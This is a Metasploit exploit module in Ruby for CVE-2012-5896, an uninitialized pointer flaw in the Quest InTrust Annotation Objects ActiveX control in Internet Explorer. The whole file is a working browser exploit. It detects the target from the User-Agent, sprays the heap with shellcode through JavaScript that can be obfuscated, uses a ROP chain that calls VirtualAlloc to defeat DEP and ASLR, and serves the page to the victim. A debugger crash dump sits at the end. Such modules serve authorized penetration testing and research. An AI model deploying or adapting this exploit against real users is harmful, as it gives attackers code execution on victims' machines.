##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super( update_info(info,
      'Name'           => 'Quest InTrust Annotation Objects Uninitialized Pointer',
      'Description'    => %q{
          This module exploits an uninitialized variable vulnerability in the
        Annotation Objects ActiveX component. The ActiveX component loads into memory without
        opting into ALSR so this module exploits the vulnerability against windows Vista and
        Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
        points to part of the ROP chain in a heap chunk and the calculated call will hit the
        pivot in a separate heap chunk. This will take some time in the users browser.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>',             # initial discovery & poc
          'mr_me <steventhomasseeley[at]gmail.com>'   # msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-5896'],
          [ 'OSVDB', '80662'],
          [ 'BID', '52765'],
          [ 'EDB', '18674']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4]
          # calculation: <targetaddress> - 0x44024a50 / 4 = Ret
          [ 'Automatic', {} ],

          # Windows XP/Vista/IE6/IE7 target
          [
            'Windows XP/Vista SP0-SP3 (IE6/IE7)',
            {
              'Ret' => 0x76767676,
            }
          ],

          # Windows XP/IE8 target - ASLR/DEP Bypass
          [
            'Windows XP SP0-SP3 DEP bypass (IE8)',
            {
              'Ret' => 0x31AAAD78,
            }
          ],

          # Windows 7/Vista/IE8 target - ASLR/DEP Bypass
          [
            'Windows 7/Vista ALSR/DEP bypass (IE8)',
            {
              'Ret' => 0x31AAAD78,
            }
          ]
        ],
      'DisclosureDate' => 'Mar 28 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
      ])
  end

  def junk
    return rand_text_alpha(4).unpack("L")[0].to_i
  end

  def nops(s)
    nops = make_nops(4).unpack("N*") * s
    return nops
  end

  def on_request_uri(cli, request)
    #Set target manually or automatically
    my_target = target
    if my_target.name == 'Automatic'
      agent = request.headers['User-Agent']
      if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/	# xp/ie6
        my_target = targets[1]
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/	# xp/ie7
        my_target = targets[1]
      elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/	# vista/ie7
        my_target = targets[1]
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/	# xp/ie8
        my_target = targets[2]
      elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/	# vista/ie8
        my_target = targets[2]
      elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/	# win7/ie8
        my_target = targets[3]
      end
    end

    # Re-generate the payload.
    return if ((p = regenerate_payload(cli)) == nil)

    # shellcode
    sc = Rex::Text.to_unescape(p.encoded)

    # Randomize object name
    obj_name  = rand_text_alpha(rand(100) + 1)
    main_sym  = 'main' #main function name

    randnop = rand_text_alpha(rand(100) + 1)
    js_nops = Rex::Text.to_unescape("\x0c"*4)

    if my_target.name =~ /IE6/ or my_target.name =~ /IE7/

      js = <<-EOS
      function heapspray(){
        shellcode = unescape('#{sc}');
        #{randnop} = "#{js_nops};
        bigblock = unescape(#{randnop});
        headersize = 20;
        slackspace = headersize+shellcode.length;
        while (bigblock.length<slackspace){ bigblock+=bigblock; }
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length-slackspace);
        while(block.length+slackspace<0x40000){ block = block+block+fillblock; }
        memory = new Array();
        for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
      }

      function main(){
        heapspray();
  				#{obj_name}.Add(#{my_target.ret},1);
      }
      EOS

    end

    if my_target.name =~ /IE8/

      # all rop gadgets are taken from AnnotateX.dll - v1.0.32.0 (non alsr/non rebase)
      rop_gadgets = [
        junk,
        junk,
        junk,
        0x44014075  # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
      ].pack('V*')

      rop_gadgets << [0x44015CEF].pack('V*') * 140	# padding of retn's

      rop_gadgets << [
        0x44015CEF,  # retn
        0x44015CEF,  # retn
        0x44015CEF,  # retn
        0x44015cee,  # pop edx ; retn
        0x4401a130,  # ptr to &VirtualAlloc() (IAT)
        0x44015ca4,  # mov eax,[edx+4] ; retn
        0x44001218,  # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
        junk,        # filler (compensate)
        0x440159bb,  # pop ebp ; retn
        junk,        # filler (retn offset compensation)
        junk,        # filler (retn offset compensation)
        junk,        # filler (retn offset compensation)
        junk,        # filler (retn offset compensation)
        0x4400238A,  # filler (pop edi ; pop esi ; pop ebp ; retn)
        0x440012c1,  # push esp ; ret 08
        0x44016264,  # pop ebx ; retn
        0x00004000,  # 0x00000001-> ebx
        0x44015cc9,  # pop edx ; retn
        0x00001000,  # 0x00001000-> edx
        0x44017664,  # pop ecx ; retn
        0x00000040,  # 0x00000040-> ecx
        0x44017bd8,  # pop edi ; retn
        0x44017ebe,  # retn
        0x4400bf25,  # pop eax ; retn
        0x0C0C2478,  # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
        0x44005C57,  # pushad ; push 8 ; push ecx; push esi; call [eax+c]
        0x90909090,  # nops, do not change as it changes the offset
        nops(11)
      ].flatten.pack('V*')

      rop = Rex::Text.to_unescape(rop_gadgets)

      js = <<-EOF
      function heapspray(){
        var payload = unescape('#{rop}');
        payload += unescape('#{sc}');
        var data = payload;
        while(data.length < 100000) { data += data; }
        var onemeg = data.substr(0, 64*1024/2);

        for (i=0; i<14; i++) {
          onemeg += data.substr(0, 64*1024/2);
        }

        onemeg += data.substr(0, (64*1024/2)-(38/2));
        var block = new Array();

        for (i=0; i<700; i++) {
          block[i] = onemeg.substr(0, onemeg.length);
    			}
      }

      function main(){
        heapspray();
        #{obj_name}.Add(#{my_target.ret},1);
      }
      EOF

      #JS obfuscation on demand only for IE8
      if datastore['OBFUSCATE']
        js = ::Rex::Exploitation::JSObfu.new(js)
        js.obfuscate(memory_sensitive: true)
        main_sym = js.sym('main')
      end

    end

    content = <<-EOF
    <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>
    <script language='JavaScript' defer>
    #{js}
    </script>
    <body onload="#{main_sym}();">
    <body>
    </html>
    EOF

    print_status("Sending #{self.name}")

    #Remove the extra tabs from content
    content = content.gsub(/^ {4}/, '')

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
=begin
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
=end
